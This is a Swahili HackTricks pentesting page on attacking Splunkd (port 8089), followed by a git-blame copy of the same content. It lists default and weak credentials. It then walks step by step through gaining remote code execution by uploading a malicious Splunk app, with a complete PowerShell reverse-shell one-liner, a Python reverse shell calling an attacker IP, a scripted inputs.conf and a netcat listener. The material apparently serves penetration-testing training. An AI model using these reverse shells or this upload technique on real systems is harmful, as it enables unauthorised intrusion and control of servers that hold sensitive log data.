hacktricks/network-services-pentesting/8089-splunkd.md

# 8089 - Kupima Usalama wa Splunkd

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

## **Taarifa Msingi**

Splunk ni **zana ya uchambuzi wa magogo** ambayo inacheza jukumu muhimu katika **ukusanyaji, uchambuzi, na uchoraji wa data**. Ingawa madhumuni yake ya awali hayakuwa kuwa zana ya **SIEM (Usimamizi wa Habari na Matukio ya Usalama)**, imepata umaarufu katika uwanja wa **uchunguzi wa usalama** na **uchambuzi wa biashara**.

Matumizi ya Splunk mara nyingi hutumiwa kuhifadhi **data nyeti** na inaweza kutumika kama **chanzo muhimu cha habari** kwa wadukuzi ikiwa wanafanikiwa kudukua mfumo.
**Bandari ya chaguo-msingi:** 8089
```
PORT     STATE SERVICE VERSION
8089/tcp open  http    Splunkd httpd
```
{% hint style="info" %}
**Seva ya wavuti ya Splunk inaendesha kwa chaguo-msingi kwenye bandari 8000**.
{% endhint %}

## Uchunguzi

### Toleo la Bure

Jaribio la Splunk Enterprise linabadilika kuwa **toleo la bure baada ya siku 60**, ambalo **halihitaji uwakilishi**. Si jambo la kawaida kwa wasimamizi wa mfumo kufunga jaribio la Splunk ili kuitumia, ambalo **baadaye husahauliwa**. Hii itabadilika moja kwa moja kuwa toleo la bure ambalo halina aina yoyote ya uwakilishi, ikileta pengo la usalama katika mazingira. Baadhi ya taasisi zinaweza kuchagua toleo la bure kutokana na mipaka ya bajeti, bila kuelewa kabisa athari za kutokuwa na usimamizi wa mtumiaji/jukumu.

### Uthibitisho wa Cheti cha Msingi

Kwenye toleo za zamani za Splunk, uthibitisho wa cheti cha msingi ni **`admin:changeme`**, ambazo zinaonyeshwa kwa urahisi kwenye ukurasa wa kuingia.\
Hata hivyo, **toleo jipya zaidi la Splunk** linaweka **uthibitisho** **wakati wa mchakato wa usakinishaji**. Ikiwa uthibitisho wa cheti cha msingi hautafanyi kazi, ni vyema kuangalia nywila dhaifu za kawaida kama vile `admin`, `Karibu`, `Karibu1`, `Nenosiri123`, n.k.

### Kupata Taarifa

Baada ya kuingia kwenye Splunk, tunaweza **kuvinjari data**, kukimbia **ripoti**, kuunda **dashibodi**, **kusakinisha programu** kutoka maktaba ya Splunkbase, na kusakinisha programu za desturi.\
Pia unaweza kukimbia nambari: Splunk ina njia nyingi za **kuendesha nambari**, kama vile programu za Django upande wa seva, vituo vya REST, pembejeo zilizoandikwa, na hati za tahadhari. Njia ya kawaida ya kupata utekelezaji wa nambari kijijini kwenye seva ya Splunk ni kupitia matumizi ya pembejeo iliyosakinishwa.

Zaidi ya hayo, kwa kuwa Splunk inaweza kusakinishwa kwenye mwenyeji wa Windows au Linux, pembejeo zilizoandikwa zinaweza kuundwa ili kukimbia Bash, PowerShell, au hati za Batch.

### Shodan

* `Kujenga Splunk`

## Utekelezaji wa Nambari Kijijini (RCE)

### Kuunda Programu ya Desturi

Programu ya desturi inaweza kukimbia **hati za Python, Batch, Bash, au PowerShell**.\
Tafadhali kumbuka kwamba **Splunk inakuja na Python iliyosakinishwa**, hivyo hata kwenye mifumo ya **Windows** utaweza kukimbia nambari ya python.

Unaweza kutumia [**hii**](https://github.com/0xjpuff/reverse\_shell\_splunk) pakiti ya Splunk ili kutusaidia. **`bin`** directory katika repo hii ina mifano kwa [Python](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/rev.py) na [PowerShell](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/run.ps1). Hebu tuende hatua kwa hatua.

Ili kufanikisha hili, kwanza tunahitaji kuunda programu ya desturi ya Splunk kwa kutumia muundo wa saraka ifuatayo:
```shell-session
tree splunk_shell/

splunk_shell/
├── bin
└── default
```
**`bin`** directory itakuwa na **scripts ambazo tunakusudia kuendesha** (katika kesi hii, **PowerShell** reverse shell), na saraka ya chaguo-msingi itakuwa na faili yetu ya `inputs.conf`. Reverse shell yetu itakuwa **PowerShell one-liner:**
```powershell
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(
```
Faili ya [inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) inaambia Splunk **ambayo script ya kukimbia** na hali nyingine yoyote. Hapa tunaweka programu kama iliyoruhusiwa na kumwambia Splunk kukimbia script kila sekunde 10. Kipindi kawaida ni sekunde, na kuingiza (script) itakimbia tu ikiwa mipangilio hii ipo.
```shell-session
cat inputs.conf

[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10
```
Tunahitaji faili ya `.bat`, ambayo itaendeshwa wakati programu inapowekwa na kutekeleza amri ya PowerShell moja.

Hatua inayofuata ni kuchagua `Install app from file` na kupakia programu.

<figure><img src="../.gitbook/assets/image (4) (5) (1).png" alt=""><figcaption></figcaption></figure>

Kabla ya kupakia programu mbaya ya desturi, hebu tuanze kusikiliza kwa kutumia Netcat au [socat](https://linux.die.net/man/1/socat).
```shell-session
sudo nc -lnvp 443

listening on [any] 443 ...
```
Kwenye ukurasa wa `Upload app`, bonyeza kwenye kivinjari, chagua tarball tuliyounda mapema na bonyeza `Upload`. Mara tu tunapopakia programu, tunapokea **reverse shell** na hali ya programu itabadilishwa moja kwa moja kuwa `Enabled`.

#### Linux

Ikiwa tunashughulika na **mwenyeji wa Linux**, tunahitaji **hariri skripti ya Python ya `rev.py`** kabla ya kuunda tarball na kupakia programu mbaya ya desturi. Mchakato mwingine utakuwa sawa, na tutapata uhusiano wa reverse shell kwenye msikilizaji wetu wa Netcat na kuendelea na shughuli.
```python
import sys,socket,os,pty

ip="10.10.14.15"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')
```
### RCE & Upanuzi wa Mamlaka

Katika ukurasa ufuatao unaweza kupata maelezo jinsi huduma hii inaweza kutumiwa kwa kusudi la upanuzi wa mamlaka na kupata uthabiti:

{% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %}
[splunk-lpe-and-persistence.md](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md)
{% endcontent-ref %}

## Marejeo

* [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213)

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Translated to Swahili 2024-02-11 02:13:58 +00:00			`# 8089 - Kupima Usalama wa Splunkd`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
arte 2024-02-03 02:15:34 +01:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia [MPANGO WA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [swag rasmi wa PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) za kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au [kikundi cha telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00			`</details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Taarifa Msingi`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Splunk ni zana ya uchambuzi wa magogo ambayo inacheza jukumu muhimu katika ukusanyaji, uchambuzi, na uchoraji wa data. Ingawa madhumuni yake ya awali hayakuwa kuwa zana ya SIEM (Usimamizi wa Habari na Matukio ya Usalama), imepata umaarufu katika uwanja wa uchunguzi wa usalama na uchambuzi wa biashara.`
GitBook: [master] 2 pages modified 2020-11-06 00:32:50 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Matumizi ya Splunk mara nyingi hutumiwa kuhifadhi data nyeti na inaweza kutumika kama chanzo muhimu cha habari kwa wadukuzi ikiwa wanafanikiwa kudukua mfumo.`
			`Bandari ya chaguo-msingi: 8089`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 2 pages modified 2020-11-06 00:32:50 +00:00			`PORT STATE SERVICE VERSION`
			`8089/tcp open http Splunkd httpd`
			```
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00			`{% hint style="info" %}`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Seva ya wavuti ya Splunk inaendesha kwa chaguo-msingi kwenye bandari 8000.`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00			`{% endhint %}`
GitBook: [master] 2 pages modified 2020-11-06 00:32:50 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Uchunguzi`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Toleo la Bure`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			Jaribio la Splunk Enterprise linabadilika kuwa toleo la bure baada ya siku 60, ambalo halihitaji uwakilishi. Si jambo la kawaida kwa wasimamizi wa mfumo kufunga jaribio la Splunk ili kuitumia, ambalo baadaye husahauliwa. Hii itabadilika moja kwa moja kuwa toleo la bure ambalo halina aina yoyote ya uwakilishi, ikileta pengo la usalama katika mazingira. Baadhi ya taasisi zinaweza kuchagua toleo la bure kutokana na mipaka ya bajeti, bila kuelewa kabisa athari za kutokuwa na usimamizi wa mtumiaji/jukumu.
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Uthibitisho wa Cheti cha Msingi`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			Kwenye toleo za zamani za Splunk, uthibitisho wa cheti cha msingi ni `admin:changeme`, ambazo zinaonyeshwa kwa urahisi kwenye ukurasa wa kuingia.\
			Hata hivyo, toleo jipya zaidi la Splunk linaweka uthibitisho wakati wa mchakato wa usakinishaji. Ikiwa uthibitisho wa cheti cha msingi hautafanyi kazi, ni vyema kuangalia nywila dhaifu za kawaida kama vile `admin`, `Karibu`, `Karibu1`, `Nenosiri123`, n.k.
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Kupata Taarifa`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Baada ya kuingia kwenye Splunk, tunaweza kuvinjari data, kukimbia ripoti, kuunda dashibodi, kusakinisha programu kutoka maktaba ya Splunkbase, na kusakinisha programu za desturi.\`
			`Pia unaweza kukimbia nambari: Splunk ina njia nyingi za kuendesha nambari, kama vile programu za Django upande wa seva, vituo vya REST, pembejeo zilizoandikwa, na hati za tahadhari. Njia ya kawaida ya kupata utekelezaji wa nambari kijijini kwenye seva ya Splunk ni kupitia matumizi ya pembejeo iliyosakinishwa.`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Zaidi ya hayo, kwa kuwa Splunk inaweza kusakinishwa kwenye mwenyeji wa Windows au Linux, pembejeo zilizoandikwa zinaweza kuundwa ili kukimbia Bash, PowerShell, au hati za Batch.`
GitBook: [master] 2 pages modified 2020-11-06 00:32:50 +00:00
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`### Shodan`
GitBook: [master] 2 pages modified 2020-11-06 00:32:50 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			* `Kujenga Splunk`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Utekelezaji wa Nambari Kijijini (RCE)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Kuunda Programu ya Desturi`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Programu ya desturi inaweza kukimbia hati za Python, Batch, Bash, au PowerShell.\`
			`Tafadhali kumbuka kwamba Splunk inakuja na Python iliyosakinishwa, hivyo hata kwenye mifumo ya Windows utaweza kukimbia nambari ya python.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			Unaweza kutumia [hii](https://github.com/0xjpuff/reverse\_shell\_splunk) pakiti ya Splunk ili kutusaidia. `bin` directory katika repo hii ina mifano kwa [Python](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/rev.py) na [PowerShell](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/run.ps1). Hebu tuende hatua kwa hatua.
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Ili kufanikisha hili, kwanza tunahitaji kuunda programu ya desturi ya Splunk kwa kutumia muundo wa saraka ifuatayo:`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00			```shell-session
			`tree splunk_shell/`

			`splunk_shell/`
			`├── bin`
			`└── default`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			`bin` directory itakuwa na scripts ambazo tunakusudia kuendesha (katika kesi hii, PowerShell reverse shell), na saraka ya chaguo-msingi itakuwa na faili yetu ya `inputs.conf`. Reverse shell yetu itakuwa PowerShell one-liner:
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00			```powershell
			`$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 \| Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Faili ya [inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) inaambia Splunk ambayo script ya kukimbia na hali nyingine yoyote. Hapa tunaweka programu kama iliyoruhusiwa na kumwambia Splunk kukimbia script kila sekunde 10. Kipindi kawaida ni sekunde, na kuingiza (script) itakimbia tu ikiwa mipangilio hii ipo.`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00			```shell-session
Translated to Swahili 2024-02-11 02:13:58 +00:00			`cat inputs.conf`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
			`[script://./bin/rev.py]`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`disabled = 0`
			`interval = 10`
			`sourcetype = shell`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
			`[script://.\bin\run.bat]`
			`disabled = 0`
			`sourcetype = shell`
			`interval = 10`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			Tunahitaji faili ya `.bat`, ambayo itaendeshwa wakati programu inapowekwa na kutekeleza amri ya PowerShell moja.
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			Hatua inayofuata ni kuchagua `Install app from file` na kupakia programu.
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
GitBook: [#3711] No subject 2022-12-25 19:08:07 +00:00			`<figure><img src="../.gitbook/assets/image (4) (5) (1).png" alt=""><figcaption></figcaption></figure>`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Kabla ya kupakia programu mbaya ya desturi, hebu tuanze kusikiliza kwa kutumia Netcat au [socat](https://linux.die.net/man/1/socat).`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00			```shell-session
			`sudo nc -lnvp 443`

			`listening on [any] 443 ...`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			Kwenye ukurasa wa `Upload app`, bonyeza kwenye kivinjari, chagua tarball tuliyounda mapema na bonyeza `Upload`. Mara tu tunapopakia programu, tunapokea reverse shell na hali ya programu itabadilishwa moja kwa moja kuwa `Enabled`.
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
			`#### Linux`

Translated to Swahili 2024-02-11 02:13:58 +00:00			Ikiwa tunashughulika na mwenyeji wa Linux, tunahitaji hariri skripti ya Python ya `rev.py` kabla ya kuunda tarball na kupakia programu mbaya ya desturi. Mchakato mwingine utakuwa sawa, na tutapata uhusiano wa reverse shell kwenye msikilizaji wetu wa Netcat na kuendelea na shughuli.
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00			```python
			`import sys,socket,os,pty`

			`ip="10.10.14.15"`
			`port="443"`
			`s=socket.socket()`
			`s.connect((ip,int(port)))`
			`[os.dup2(s.fileno(),fd) for fd in (0,1,2)]`
			`pty.spawn('/bin/bash')`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### RCE & Upanuzi wa Mamlaka`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Katika ukurasa ufuatao unaweza kupata maelezo jinsi huduma hii inaweza kutumiwa kwa kusudi la upanuzi wa mamlaka na kupata uthabiti:`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
			`{% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %}`
			`[splunk-lpe-and-persistence.md](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md)`
			`{% endcontent-ref %}`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Marejeo`
GitBook: [#3537] No subject 2022-10-03 00:11:21 +00:00
			`* [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213)`

			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
arte 2024-02-03 02:15:34 +01:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia [MPANGO WA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [swag rasmi ya PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [The PEASS Family](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) za kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au [kikundi cha telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`